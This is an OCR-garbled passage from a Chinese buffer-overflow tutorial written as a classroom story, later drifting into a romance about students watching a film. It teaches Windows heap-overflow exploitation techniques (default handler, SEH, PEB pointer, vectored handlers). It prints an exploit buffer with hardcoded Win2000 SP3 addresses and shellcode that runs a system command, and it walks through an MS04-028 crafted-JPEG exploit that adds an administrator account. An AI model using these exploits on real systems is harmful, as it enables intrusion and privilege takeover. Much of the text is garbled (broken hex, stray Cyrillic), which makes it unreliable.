小 知识 : Flag 段 每 位 的 含义 

0x01 - HEAP ENTRY BUSY 

0x02 - HEAP ENTRY EXTRA PRESENT 
0x04 - HEAP ENTRY FILL PATTERN 
0x08 - HEAP ENTRY VIRTUAL ALLOC 
0x10 - HEAP ENTRY LAST ENTRY 
0x20 - HEAP ENTRY SETTABLE FLAG1 
0x40 - HEAP ENTRY SETTABLE FLAG2 


0x80 - HEAP ENTRY SETTABLE FLAG3 
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Q 有 版 缓冲 区 浴 出 教程 


4.4.3 What 一 where 


“在 这 样 的 构造 下 ，RtlFreeHeap 的 时 候 会 有 一 系列 操作 。” 老 症 接 着 解释 道 。“ 首 先 ，esi 是 指 
向 ‘Buf2’ 的 管理 结构 ， 后 面 会 有 esi=esi-24 的 操作 ，esi 束 指向 了 'Buf1* 的 存储 空间 数据 。 如 图 4 
—46, " 


add esi, -24 后 
后 来 ESI 指 向 这 里 ..， 








_ ESI 原来 指向 这 














"S мБ лк ee EE х. 
Ты аба озб а an^ 
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“然后 会 有 ， mov eax,[esi] ; mov esi, [esi+4] 的 操作 ， 现 在 eax 和 esi 都 是 'Buf1' 中 的 数据 了 。 
如 图 4 一 47。” 
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Q 有 版 缓冲 区 浴 出 教程 


mov езі, [esi+4] 


+0 














+64 





“最 后 ， 有 一 个 тоу [esi], eax 的 操作 (84—48) , BD3&411BSEMBJwhat—where, ix ER 
where 是 esi，what 是 eax， 而 且 esi 和 eax 是 'Buf1' 中 的 数据 ， 都 是 我 们 可 以 控制 的 。” 


+Ü 





“ 哦 ， 那 我 们 精心 构造 B 的 管理 结构 的 值 ， 并 履 盖 抒 what 和 where 位 置 上 的 值 融 可 以 了 上 ” 宇 强 
现在 明日 了 。 
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4.4.4 1435 HII FH 


“对 ， 我 们 构造 一 个 示意 图 (图 4 一 49) 








+32 0300005 。。B 的 存储 空间 
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“ 那 我 们 按照 这 个 结构 构造 出 利用 的 'mybuf 融 可 以 了 。 "大 家 七 手 八 脚 的 构造 出 了 mybuf 数 据 。 


char mybuf[] = "11112222" 
"Nx1fNxf9Nxe2Nx77" //what call[esi+0x4c] in user32 
"\х4с\х©4\хес\х77" //where TOP SEH іп 2000 sp3 cn 
//"NxaaNxaaNxaaNxaa" //test 
"5555666677778888NX03NX00NX05Nx90NX0O0Nx99" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NXx90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90Nx90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NXx90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NXx90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NXx90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NXx90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NXx90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NXx90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NXx90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90Nx90" 
"NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NX90NXx90" 
// 下 面 是 Win2000 SPS3TÉSJFDOSÉILIÉSShellCode, 24&5—3 
"NX90NX90Nx90Nx90Nx90Nx90Nx90Nx90Nx90Nx90Nx90' 
"NX55NX8BNxXECNx33NxC0O0NX50NX50NxX50NxXC6NxX45NXF4NxX4DNXC6NxX45NxF5Nx53' 
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6 
"\x45\xXFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA" 
"\x64\x9f\xE6\x77" //sp3 loadlibrary 地 址 909x77e69f64 
"\x52\x8D\x45\xF4\x50" 
"\xFF\x55\xFO" 
"\x55\X8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E" 
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4" 
"\x50\xB8" 
"Nxc3NxafNx01Nx78" //SP3 systemithibox7801afc3 
"AXFFNXDO" ; 


让 =- ЧА 
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呵呵， 大 家 回去 测试 一 下 ， 如 果 有 什么 问题 ， 目 己 要 试看 解决 1 "” 老 评说 道 , “而 现在 ， 我 们 
继续 探讨 堆 浴 出 利用 的 问题 。” 


4.5 HE HH BJ RR A A =Ç 


“ 堆 浴 出 利用 的 本 质 ， 就 是 使 其 产生 what 一 where 的 操作 ， 而 让 系统 走向 我 们 想 要 的 流程 。 所 
以 把 what 和 where 履 盖 成 什么 值 是 利用 能 否 成 功 的 关键 。 "老病 说 道 。 "刚才 我 们 使 用 的 是 默认 
异常 义理 地 址 ， RT 把 what 覆 盖 成 ShellCode 地 址 或 
能 达到 ShellCode 的 语句 地 址 。 


“ 轧 ，Windows2000 下 的 what 就 是 call [esi+0x4c] 指使 的 地 址 ? "同学 们 说 道 。 


“对 ， 对 于 Windows2000， 还 可 以 是 call [ebp+0x74] 指使 的 地 址 ， 而 在 XP 系统 下 ， 则 是 
callledi+0x78] 指 倒 的 地 址 。 


“这 种 履 兰 方法 ， 看 起 来 还 是 不 错 嘛 ! "大 家 看 起 来 都 很 满意 。 


“这 种 方法 的 优点 是 比较 准确 ; 但 缺点 是 需要 确切 知道 对 方 的 系统 和 SP 补丁 号 一 一 默认 异 弟 的 
处 理 地 址 在 各 个 版 本 和 SP 下 都 是 不 同 的 。” 


“是 啊 1 "这 句 话 提醒 了 大 冢 , “好 像 还 提 到 过 把 where 履 再 成 SEH 的 方法 吧 ! " 


“是 的 ， 那 是 把 where 履 盖 成 当前 异常 义理 程序 地 址 ，what 履 盖 成 能 达到 ShellCode 的 语句 地 
HE, " 


“前 面 也 说 过 ， 这 种 方法 的 优点 与 对 方 的 系统 和 补丁 无 关 ， 会 比较 准确 通用 ; 但 缺点 是 需要 对 
方 线程 地 址 是 固定 的 。 


“ 哦 ， 那 有 别 的 更 好 的 覆盖 方法 吗 ? "大 冢 对 已 有 的 利用 方式 还 不 满意 。 
“基于 对 Windows 系 统 的 深层 认识 ， 还 有 另外 一 些 方法 ; 但 总 的 说 来 ， 这 些 也 是 类 似 的 。” 老 病 


回答 道 。 


4.5.1 #= PEB 
小 知识 : PEB 和 TEB 
PEB， 指 进程 环境 块 。TEB， 指 线程 环境 块 。 


在 编程 实现 时 ， 可 以 通过 FS 寄存 器 找到 TEB、PEB 巷 至 默认 堆 的 起 始 地 址 。 具 体 说 ， 就 是 FS: 
[18] TEB ; TEB+30 一 PEB ; PEB+18 一 默认 的 堆 地 址 。 在 ShellCode 高 级 编写 中 会 有 详细 讲 
Ё. 

“在 NT4/Windows2000/XP 下 ，PEB 的 值 都 是 国定 的 ， 都 是 0x7FFDF000。 ПХЕРЕВ 20х20 
的 地 方 ( 即 0x7FFDF020) ， 有 一 个 函数 指针 一 RtlEnterCriticalSection() 本 数 的 指针 。 如 图 
4—50, " 


PEB 
Header 


RtlEnterCriticalSection 国 数 指针 
0x7ffdf020 





“ 哦 ， 莫 非 我 们 可 把 where 履 盖 成 它 ?3 " 玉 波 问 道 。 


“对 | RtIEnterCriticalSection() 画 数 很 多 地 方 都 要 用 到 ， 我 们 如 果 把 0xX7FFDF020 覆 盖 成 
ShellCode 的 地 址 ， 那 么 系统 调用 RtlEnterCriticalSection 玉 数 时 就 会 进入 我 们 的 ShellCode。 
履 盖 示意 图 如 图 4 一 51。” 





“9; 1 0x7FFDF020 这 个 地 址 对 所 有 版 本 和 系统 都 是 通用 的 ; 那 我 们 可 得 到 版 本 无 关 的 履 盖 
了 ?” 大 家 说 道 。 


“是 的 ， 这 是 该 方法 最 大 的 优点 ; 但 也 有 缺点 ， 就 是 需要 目标 程序 在 后 面 调 用 
RtlEnterCriticalSection () 国 数 才 能 进入 我 们 的 ShellCode。” 


的确 是 这 样 啊 ! ” 


四 


“而 且 这 样 的 覆 荔 也 有 可 能 会 引发 异 弟 。 所 以 能 否 进入 我 们 的 ShellCode， 束 需要 具体 程序 8 
体 分 析 ， 不 能 一 概 而 论 。” 


/ 


4.5.2 Æ Vector F + OHA 


“在 XP 下 ， 有 一 种 特殊 的 结构 
同 ，Vector 是 存在 堆 里 的 。” 





Vector 异 弟 句 柄 结构 。 它 和 传统 的 异 前 义理 链 存 在 堆栈 中 不 


小 知识 : Vector 异常 句柄 结构 


struct _VECTORED_EXCEPTION_NODE 


DWORD m_pNextNode; 
DWORD m_pPreviousNode; 
PVOID m pfnVectoredHandler; 


} 


“ 哦 ?莫非 我 们 可 通过 覆盖 它 来 实现 跳 转 ?” 宇 强 听 出 了 一 点 意思 。 

"RA T 很 有 创新 思维 嘛 1 "老病 笑 道 。 

宇 强 不 好 意思 的 小 声 对 小 倩 说 : "其实 老病 都 说 出 这 个 意思 了 1!” 

小 倩 回 道 : “但 你 悟性 的 确 很 好 啊 1 ” 

“那里 哦 ! 听 听 老病 怎么 讲 的 吧 ! FRA ж {ЕЕ ДА, DEAS AIRT o 


老病 在 台 上 说 :“ 就 是 这 样 的 ， 第 一 个 Vector 异 常 句 柄 位 于 地 址 0x77FC3210 中 ， 当 作对 常 处 理 
时 ， 会 有 下 面 的 处 理 : ” 


Mov esi, : [0x77FC3210] 
call [esi+8] 


"BEA, #11 мһеге2 2 pk0x77FC3210, miEwhat z PkShellCodeB%Jibhlir—8, W4- 
925° 





两 个 双 链 表 指 和 针 


ЧБ ShellCodeBS3t&3Eze0x0012FF50, 3X4 15i whatz& zs EX0x0012FF50 —8— 
0x0012FFA48, ` 


“ 当 执 行 what 一 where 时 ，0x77FC3210 融 会 设 为 0x0012FF48 ; 3x ETE Е Emp, ^ 
mov esi,:[0x77FC3210] ，esi 就 会 变 为 0x0012FF48 ; 再 执行 call [esi+8] 时 ， 就 是 执行 call 
0x0012FF50, ` 


"Dg | 这 样 就 可 进入 位 于 0x0012FF50 地 址 的 ShellCode 了 。 "大 家 说 道 。 
“是 的 1” 
“这 种 方法 也 有 不 足 之 处 吗 ?” 


“又 让 大 家 失望 了 ， 的 人 确 是 的 ，” 老 病 说 道 ,，“ 第 一 个 不 足 是 只 针对 XP 系统 有 效 ，Win2000 下 是 
没有 Vector 浴 出 处 理 的 ; 第 二 个 不 足 是 : ‘What 要么 覆盖 成 ShellCode 的 地 址 ， 要 么 覆盖 成 是 
指向 ShellCode 的 某 个 地 址 ， 都 有 可 能 造成 不 可 信 的 履 盖 。” 


4.5.3 其 他 方法 


“天 啊 ! 就 没有 完美 的 办 法 么 ?” 玉 波 绝 望 的 说 。 

“我 也 知道 这 个 世界 ， 缺 乏 圆 满 ~~" 宇 强 哼 出 林志炫 的 《 散 了 吧 》 里 的 一 名 歌词 。 
“哈哈 哈 ......” 全 班 同 学 都 笑 了 

“学 习 了 这 么 多 ， 觉 得 Windows 系 统 真 有 意思 啊 | "古风 自 喃 道 。 


“操作 系统 是 最 底层 、 最 复 末 的 用 户 软 件 ， 多 亏 了 Bill Gates 创 造 出 Windows 这 种 人 性 化 的 操作 
A. ” 


老病 说 道 ,，“ 大 家 越 深入 的 学 习 ， 就 会 越 先 叹 程序 设计 这 座 美 妙 的 大 厦 。 这 里 提醒 大 家 ， 我 们 
不 仅 要 学 习 条 统 本 身 ， 蝎 关键 的 是 学 习 微 软 设 计 和 条 统 的 思想 和 实现 系统 的 方法 。 


“ 曙 ， 虽 然 没有 源 代码 ， 但 能 感觉 到 他 们 处 理 问题 的 条 理性 和 严谨 性 。" 宇 强 认真 的 说 。 


“对 ! 另外， 大 家 还 应 体会 到 团队 合作 的 必要 性 和 管理 的 重要 性 ，” 老 评说 道 , “你 们 想 啊 | 这 
么 大 一 个 系统 ， 浩 如 烟 海 的 代码 量 ， 需 要 成 千 上 万 人 的 配合 开发 ， 如 果 管 理 协调 有 任何 一 点 
没 到 位 ， 都 不 可 能 完成 的 。” 


“而 这 方面 目前 在 国内 还 很 缺乏 ， 如 果 大 家 有 机 会 ， 能 去 微软 亚洲 研究 院 和 微软 工程 院 见 识 见 
识 ， 近 距离 的 向 他 们 学 习 ， 对 自己 的 提高 是 大 有 神 益 的 1” 


“ 哦 ， 微软 研究 院 ? 想 都 不 敢 想 | "KRIET, 

Fal f Ж ОҢ Н н, MAERA, BOWN... 要 学 的 东西 很 多 ， 而 一 个 人 的 时 间 又 
是 这 么 宝贵 ， 真 的 要 抓紧 再 抓紧 ! 努力 再 努力 ! 

“老病 ， 还 有 其 他 窗 盖 方法 吗 ? "古风 把 宇 强 的 思路 拉 了 回来 。 

“如 果 对 系统 研究 得 越 深 ， 束 会 有 越 深 入 的 见解 。” 老 病 回 答 说 ，“Matt Conover 和 Oded 
Horovitz 在 BlackHat04 会 议 上 提 到 : 我 们 可 以 构造 伪造 的 堆 块 ， 使 它 释 放 时 能 算出 ShellCode 
的 地 址 1” 

“ 呵 ? 算 出 来 ?3 СОО: KE Y IB 1” 


“这 里 的 算出 ， 是 确切 的 计算 出 堆 的 地 址 ! Matt 和 Oded 在 深入 研究 了 Windows 堆 管理 后 指出 : 
我 们 申请 小 于 1024 大 小 的 堆 块 ， 系 统 会 释放 到 Lookaside 结 构 中 ， 而 Lookaside 的 地 址 是 知道 
的 ， 我 们 也 知道 会 释放 到 哪个 结 点 中 ， 所 以 我 们 就 可 知道 堆 块 释放 后 的 地 址 是 多 少 T 


“给 大 家 举 个 例子 ， 假 设 堆 的 基 址 是 0x70000，Lookaside 在 堆 基 址 偏 移 0x0688 的 地 方 ， 即 地 
址 是 0x70688。 我 们 申请 分 配 922 大 小 的 堆 块 ， 释 放 时 器 会 把 它 放 在 : 取 8 对 齐 

(922) /8=936/8=0x75 的 Lookaside 位 置 中 ， 每 个 Lookaside 位 置 占据 0x30 的 大 小 ， 所 以 我 们 
的 堆 的 地 址 就 是 0х70688+0х75*0х30=0х71с78 ! ” 


“l 还 可 以 这 样 啊 ! ” 
“我 们 的 ShellCode 丈 会 在 其 中 ， 这 下 项 精确 知道 ShellCode 的 地 址 了 !" 
“这 真是 ...... 不 走 寻 党 路 ， 世 界 真 奇妙 ...... "大 家 对 Matt 和 Oded 的 思维 佩服 得 无 话 可 说 。 


“在 Windows 下 ， 堆 的 官 理 非常 复 困 ， 还 有 另外 一 些 复 杂 的 技术 可 以 利用 ， 但 这 里 束 不 提 7 了 ， 
以 后 有 机 会 再 说 吧 。" 老 病 说 追 。 


“其 实 ， 还 有 一 个 常用 方法 ， 就 是 覆 差 本 数 或 者 函数 的 返回 点 ， 但 就 更 需要 结合 具体 的 漏洞 来 
分 析 了 。” 


“可 以 真实 的 学 习 一 下 吗 ?” 


“当然 可 以 啊 ! 我 们 来 看 一 个 比较 新 的 堆 洽 出 漏洞 一 一 MS04-028 堆 洽 出 漏洞 。” 
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“MS04-028;8;PJEEWindows XP/Windows ХР SP1 和 其 他 一 些 (如 .NET 等 ) 点 用 软件 在 处 理 
伪造 JPEG 图 片 时 出 现 的 问题 。 "老病 指 看 图 4 一 53 说 。 
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Ж] at? Ee irti 
“ 哦 ， 是 扒 浴 出 漏洞 ， 并 能 做 利用 执行 任意 代码 呢 ! "大 家 仔细 看 了 公告 后 说 道 。 
“是 的 ， 正 好 我 们 学 习 蕉 浴 出 ， 一 起 来 分 析 利 用 它 吧 1” 


KRANTEN, RIRI T ER. 


4.6 3: 9 ——JPEG A IE HEA ЕН ВӘ FB 205 


4.6.1 漏洞 的 起 因 


“JPEG 是 联合 图 像 专家 小 组 的 英文 缩写 ， 该 小 组 制定 了 图 像 压 缩 的 国际 标准 算法 
法 ， 由 该 算法 产生 的 图 像 就 是 JPEG 图 像 。” 老 炳 说 道 。 





JPEG 算 


小 知识 : JPEG 图 像 的 主要 格式 

0xFFD8 “图像 开始 标志 

OxFFEO -OxFFEF 应 用 0~ 应 用 F 标 志 ， 标 志 后 面 接 相关 数据 ， 下 同 
0xFFFE 注释 标志 

OxFFDB 量化 表 标 志 

OxFFDO 帧 开始 标志 

0xFFD4 哈 夫 曼 表 标志 

0xFFDA 图 象 数据 标志 

0xFFD9 图 像 结束 标志 


“会 出 现 问题 的 地 方 在 注释 部 分 ， 注 释 段 以 0xFFFE 为 开始 标志 ; 后 面 是 注释 段 的 长 度 值 ， 再 后 
面 为 注释 的 数据 。” 


“注释 段 的 长 度 值 是 2 个 字 节 的 无 符号 数 ， 其 值 为 注释 的 数据 长 度 +2， 这 里 的 2 是 长 度 值 本 号 
占用 的 2 个 字 节 。 一 个 合法 的 注释 段 如 图 4 一 54。” 


РЕВ RE 


OxOO04 





老病 指 看 图 解释 道 : "注释 效 据 '"0x0102 为 2 个 字 节 ， 所 以 长 度 值 三 2+2=4。 当 系统 要 找 贝 注释 
内 容 时 ， 融 分 配 长 度 值 一 2 =4 一 2 三 2 的 宪 间 ， 然 后 把 注释 内 容 挝 到 那个 空间 去 。 


“ 虽 ， 看 起 来 都 很 好 啊 ? 有 什么 问题 吗 ? "古风 问 道 。 


“呵呵 | 问题 融 在 这 里 ， 由 于 长 度 值 本 身 占 据 的 两 个 字 节 要 计 人 长 度 中 ， 所 以 长 度 值 的 最 小 值 
为 2， 表 示 没 有 注释 数据 在 后 面 。 而 如 果 长 度 值 被 伪造 为 0 或 1， 大 家 想 想 会 有 什么 问题 
呢 ? "老病 望 看 台 下 听讲 的 同学 们 。 


“长 度 值 会 修 减 2， 那 0 或 1 减 2， 束 会 得 到 -2 或 - 1 ， 那 程序 会 怎样 呢 ? "大 家 觉得 很 奇怪 。 


“长 度 定义 是 无 符号 数 ， 那 一 2 或 一 1 就 会 被 认为 是 .…. "老病 提醒 大 家 。 


“-2 或 -1 就 会 被 认为 是 是 无 符号 数 的 0xXFFFE 或 0xFFFF ! ” 大 家 终于 回 过 神 来 。 


“对 【这样 系统 束 分 配 大 量 的 空间 用 于 存储 并 拷贝 ， 由 于 拷贝 的 数据 非常 大 ， 目 然 束 会 引发 异 
a 


4.6.2 构造 的 特殊 性 


“ 哦 ， 那 是 不 是 引发 异常 后 ， 有 what->where 的 操作 呢 ? " 宇 强 赁 感觉 说 道 。 


“是 的 ! 异常 后 有 what 一 where 的 操作 ， 而 且 what 是 FFFE 后 的 第 12 个 字 节 ， 而 where 是 FFFE 
后 的 第 16 个 字 节 。 如 图 4 一 55。 


what where 





“ 那 我 们 把 where 履 盖 成 默认 异常 处 理 地 址 ，what 履 盖 成 ShellCode 地 址 就 可 以 了 ?” 
“好 啊 | 大 家 试 试 ?” 


“把 what 填 为 ShellCode 的 地 址 ，where 填 为 系统 默认 异常 处 理 地 址 ， 后 面 跟 上 ShellCode 的 代 
LM 生成 伪造 图 hm, 我 们 在 资 fA 源 管 理 器 中 浏 览 试 试 。” 


教室 里 一 片 安静 .……. 
这 是 怎么 回 事 呢 ? "古风 疑惑 的 看 着 老病 。 
“了 呵呵， 这 是 没有 引发 默认 异 剃 处理 啊 1" 老病 回答 说 。 


“ 哦 ! 那 我 们 换个 利用 方式 吧 ，” 上 古风 说 道 ，“ 把 where 覆 新 成 SEH 人 处 理 地 址 ，what 窗 盖 成 
ShellCode 地 址 ， 再 试 试 |” 


"BL "ix F 32 H f SEIEN. 
“这 次 引发 了 默认 异常 处 理 ， 却 没 进入 到 SEH 人 处 理 中 。” 老 病 说 道 。 
AU] 1 oix ix Z ЩО "古风 彻底 迷糊 了 。 


“呵呵 ! 堆 浴 出 漏洞 的 利用 融 是 需要 具体 漏洞 具体 分 析 。 对 于 这 个 漏洞 ， 我 们 有 特殊 的 利用 方 
法 。” 


“在 异 剃 处理 后 ， 系 统 会 返回 到 GdiPlus.dll 中 继续 执行 ， 这 是 GdiPlus.dll 特 有 的 行为 ， 不 是 每 个 
堆 洽 出 漏洞 都 会 有 的 。 


“老病 直接 说 结果 吧 ! "古风 按 耐 不 住 了 。 
“好 的 ， 履 盖 方 法 是 把 where 赋 成 0xX7830B1DC， 而 what 赋 成 EF 1F。 


老病 继续 解释 道 : “0x7830B1DC 是 XP SP1 的 GdiPlus.dll 中 的 一 个 函数 地 址 ， 在 异常 处 理 后 会 
和 佣 调 用 。 所 以 当 异 间 义 理 执行 what 一 where 时 ， 束 会 将 这 个 函数 改写 ; 异 音义 理 后 ， 会 返回 
GdiPlus.dll 中 调用 我 们 履 盖 的 范 数 。 经 过 多 次 处 理 后 ， 程 序 就 会 到 达 我 们 what 这 条 指 兮 


02106250 EB 1F JMP SHORT 02106271 


$! 我们 再 在 后 面 荆 上 ShellCode 丈 可 完成 攻击 了 ! "大 家 说 道 。 


“不 错 ， 束 是 这 样 的 1” 


4.6.3 эс ҤЙҤ 


“Hf, 思路 都 清楚 了 ， 我 们 来 构造 利用 吧 ! ”。 


“好 哆 ， 首 先是 注释 标志 0xFFFE， 然 后 是 仿造 的 注释 段 长 度 0x0001， 接 着 14 直 接 填 充 数据 
后 ， 就 是 我 们 的 what 和 where 了 。 "古风 构造 了 起 来 。 


宇 强 和 玉 波 也 接着 说 :“ 对 ， 然 后 把 what 罕 成 0xEB 1F，where 写 成 0x7830B1DC， 后 面 跟 我 们 
的 ShellCode， 如 图 4 一 56。 


р Ваа | e ызаны ShellCode 
0x0001 OxEB 1F [x^830BIDC| ' h 





“这 里 的 ShellCode 还 是 完成 添加 名 为 久 管 理 员 用 户 的 功能 ， "9 13758, “我 们 再 按照 JPEG 
的 格式 加 上 一 些 JPEG 图 片 的 数据 ， 完 成 后 得 到 xpsp1.JPEG。 


“ 那 我 们 测试 一 下 吧 1 "大 家 期 望 的 说 。 

“好 呢 ! 我 们 在 资源 管理 器 中 打开 它 ， 哇 ! 资源 管理 器 异常 重启 ， 但 用 户 添加 上 去 了 。 
“IE 1 终于 成 功 了 1” 

玉 波 感叹 的 说 :“ 看 来 堆 洽 出 的 利用 的 确 没 有 通 吃 的 办 法 了 啊 1” 


“学 知识 不 是 吃 东 西 啊 1 我 们 需要 先 掌 握 一 般 的 原理 ， 打 好 基础 ， 然 后 具体 问题 具体 分 析 ， 
样 才能 创造 性 的 解决 较 困 难 的 问题 。" 老 症 说 道 。 


吧 ， 我 们 一 定 牢记 于 心 上 

好， 这 人 么 晚 了 ， 今 天 都 到 这 里 吧 ， 大 家 平和 兰 了 上 
“Зея, тзв!" 

4.7 《月 光 宝 金 》 

小 倩 一 边 收 拾 东 西 一 边 问 宇 强 : “下课 干什么 呢 ? ' 
“我 想 去 图 书馆 借 两 本 缓冲 区 渝 出 编程 的 书 ! " 宇 强 说 。 
R! REAREA, RME!” 

“好 啊 1 " 宇 强 想到 又 可 以 和 小 倩 一 起 走 ， 真 高 兴 ! 


“lZ ға Ж PBB, ИР ЩЩ ! "走出 教室 时 衬 强 说 道 ,“ 图 书馆 劳 边 家 属 区 里 的 饺子 挺 不 错 的 ， 我 
们 去 那里 吃 吧 ! 也 顺路 。 


“好 啊 |!” JV 26 АЕ T D 


图 书馆 在 老 校门 劳 边 ， 正 对 对 着 文 科 楼 ， 一 条 治 途 长 满 高 大 柏树 的 大 道 把 它们 隔 开 。 图 书馆 
门 外 有 着 老 校 长 吴 玉 章 的 塑像 和 “海纳百川 ， iA ЛАК, 


“图 书馆 里 没有 讲 缓冲 区 浴 出 编程 的 书 呀 1” 宇 强 查 了 查 电 脑 ， 对 小 倩 说 道 。 
应 该 还 没有 出 版 过 这 方面 的 书 吧 1 ” 


“是 啊 ! 那 我 去 借 两 本 操作 系统 和 ACM 竞 赛 的 书 吧 1 《程序 设计 竞 c ? 好 Cool 的 名 字 
啊 1 刘 汝 佳 ! 哇 ! 信息 学 竞赛 的 NO.1 ! 我 去 借 这 本 书 ， 你 等 我 。 


过 了 一 会 ， 宇 强 满意 的 抱 着 一 堆 书 从 楼 上 走 下 来 ， 对 小 倩 说 :“ 真 不 错 啊 T LRJ 现 在 都 是 国家 
队 教 练 了 ， 还 在 读 大 学 也 。 这 几 本 书 是 帮 你 借 的 。 


于 强 递 给 了 吴 小 倩 一 本 《算法 导论 》 和 一 本 《Windows 核 心 编程 》。 

"B ! 都 是 好 书 啊 ， 谢 谢 你 啊 ! ” 

没事， 不 用 谢 ! 我 们 走 吧 1 ” 

两 人 走 到 了 图 书馆 门口 ， 看 见 “ 图 书馆 影院 " 贴 厦 《月 光宇 盒 》 的 海报 。 

“很 老 的 片子 啦 ! 但 很 经 典 1" 宇 强 停 下 来 ， 指 着 海报 上 带 着 紧 挤 叶 的 孙悟空 说 道 。 


“是 啊 ! 周 星 星 的 经 典 之 作 啊 ! 图 书 人 迄 影 院 融 在 劳 边 吧 ? 才 3 块 钱 ， 挺 便 家 的 嘛 ! 我 们 要 不 要 重 
im — 38 ? "ЈМ 5 SEES EY DS P] Dh, 


“好 啊 1 这 部 电影 的 每 名 台词、 每 个 眼神 、 每 个 细节 ， 都 绝对 的 经 典 。 我 每 看 一 次 ， 总 会 发 
不 同 的 东西 。” 


“ 那 好 啊 ! 看 看 这 次 你 有 没有 新 的 发 现 P" 


“现在 我 郑重 宣布 ， RE 包括 你 。” 竺 暇 的 开场 日 是 那样 的 气 贯 云 
悄 ， 像 一 个 童话 故事 〈 其 实 宇 强 心里 想 的 是 : 其 实 这 个 世界 没有 什么 属于 你 的 ， 包 括 你 自 
己 。) ! 


sa 


也 许 我 们 融 是 为 了 创造 属于 目 己 的 东西 才 来 到 这 个 世上 ， 因 为 年 轻 ， 所 以 押 注 于 爱情 ! 


至 章 至 拒绝 了 柴 霞 ， 他 以 为 目 己 还 爱 晶 晶 。 见 到 晶 晶 ， 他 又 发 现 柴 霞 示 是 和 真爱。 命运 一 下 在 
同 他 开玩笑 : 至 尊 至 忽然 成 了 孙悟空 ， 干 笠 万 吉 找 晶 晶 又 爱 上 了 柴 霞 。 而 抉择 是 那样 的 残 
п: 要 打败 牛 魔王 救 柴 霞 ， 束 必须 戴 上 紧 手 叶 做 回 俐 通 广 大 的 孙悟空 ; поя Е ЕРО ВЕ 
ВАХ, НАН. жак 53А ойу, 221 7 ЕЕ ВАТЕ ЯВ ВУ —ЈА В, 26 
经 沧海 过 【五 百年 又 五 百年 ， 儿 了 一 个 大 图 又 回 到 了 原 地 。 


“EJM, SEJMI Eo &. 紧 拖 光圈 住 吾 日 的 梦想 ， 圈 住 校 角 分 明 的 个 性 。 友 有 丈 是 一 
个 很 痛 的 词 ， 它 不 一 定 会 得 到 ， 定 会 失去 。 


“从 前 现在 过 去 便 再 不 来 ， 红 红 ҢҢ 长 埋 尘土 内 .…… o BE xIB...... ^35 Fr EE ай 
时 ， 宇 强 想 到 :“ 成 熟 ， 就 代表 会 失去 么 ...... s 


从 影院 中 出 来 ， 宇 强 和 小 倩 走 在 回答 舍 的 路 上 上， 落叶 铺 满 整个 水 泥 石 面 ， 躁 上 去 沙沙 作 响 。 
难得 的 明月 挂 在 天 上 ， 如 同日 银 一 般 倾 演 下 来 。 宇 强 望 了 望 喘 边 的 小 售 ， 是 一 层 迷 幻 的 日 
光 ..….…...“ 如 同 天 使 啊 1” 罕 强 心里 说 不 出 的 欢喜 。 


“这 部 电影 是 不 是 太 悲情 了 点 呢 ? ”小 傅 问 道 。 
“在 电影 院 里 有 那 种 感觉 ， 有 种 失 沙 感 1” 
“现在 呢 ? 


ME?’ FENKE THH, "我 又 想起 损失 ， 我 们 都 要 经 受 这 个 过 程 ， 但 正 因 为 有 损失 ， 我 
们 才能 在 生活 上 得 到 成 长 ; 生命 ， 的 确 很 短暂 ， 但 正 因为 短暂 ， 我 们 创造 的 美好 东西 在 日 后 
才能 长 期 永存 。” 


“所 以 ， 我 我 现在 乡 的 融 是 : 把 握 青 春 岁月 ， 奋 进 不 已 ， 努 力 干 一 番 事 业 1 “成 事 在 天 ， 谋 事 在 
A 


“ 哦 ， 你 能 有 这 样 的 想法 啊 ， 很 不 错 嘛 ! "ЛМЕ IBSIBU DG. 
“当然 ， 我 可 是 一 个 很 上 进 的 人 啊 1 哈哈 1” 
RE... RE ! "小 倩 突然 指 着 夜空 激动 地 说 。 
天 边 一 道 完 光滑 过 。 
“ 快 许愿 ， 快 许愿 FREE OAAR...) 
“呵呵 1 你 许 的 什么 愿望 啊 ?” 
“不 说 ， 说 出 来 就 不 有 了 | 要 默默 的 许 ! "小 倩 笑 个 不 停 。 
不 知 不 觉 已 到 了 小 倩 的 寝室 楼 下 。"“ 书 下 次 还 给 你 啊 ! "小 倩 说 。 
“好 的 ， 不 用 急 ， 你 慢 慢 看 ， 再 见 
宇 强 在 回去 的 路 上 ， 不 知 不 党 的 想起 了 《月 光 宝 使 》 的 主题 歌 。 
一 生 所 爱 
从 前 现在 过 去 便 再 不 来 
тт 落叶 长 埋 尘土 内 
开始 终结 总 是 没 变 改 
天 边 的 你 S1 Eu ...... 
苦海 翻 起 爱 恨 


在 世间 难 逃 离 命 运 
相亲 竟 不 可 接近 
或 我 应 该 相信 EAD... 


Ж 6 А = 


Q : 对 于 各 个 Windows 有 版 本 ， 堆 的 处 理 过 程 都 一 样 么 ? 


A : 堆 管 理 和 回收 是 个 很 大 的 主题 。 微 软 也 一 直 在 试验 与 改进 ， 希 望 在 效率 和 资源 占用 方面 取 
得 一 个 合理 的 折衷 。 所 以 堆 管 理 器 采用 的 分 配 算法 ， 在 不 同 的 Windows 版 本 上 是 不 同 的 ， 但 
微软 的 改进 毕竟 是 逐步 的 ， 所 以 讲 的 方法 基本 对 各 种 版 本 研究 都 有 效 。 

О: 堆 浴 出 的 利用 有 很 大 的 实际 意义 么 ? 

A: 当然 【 堆 浴 出 的 危害 还 不 像 堆 栈 渝 出 那样 被 人 认识 得 很 清楚 。 无 论 是 实际 的 利用 ， 还 是 深 
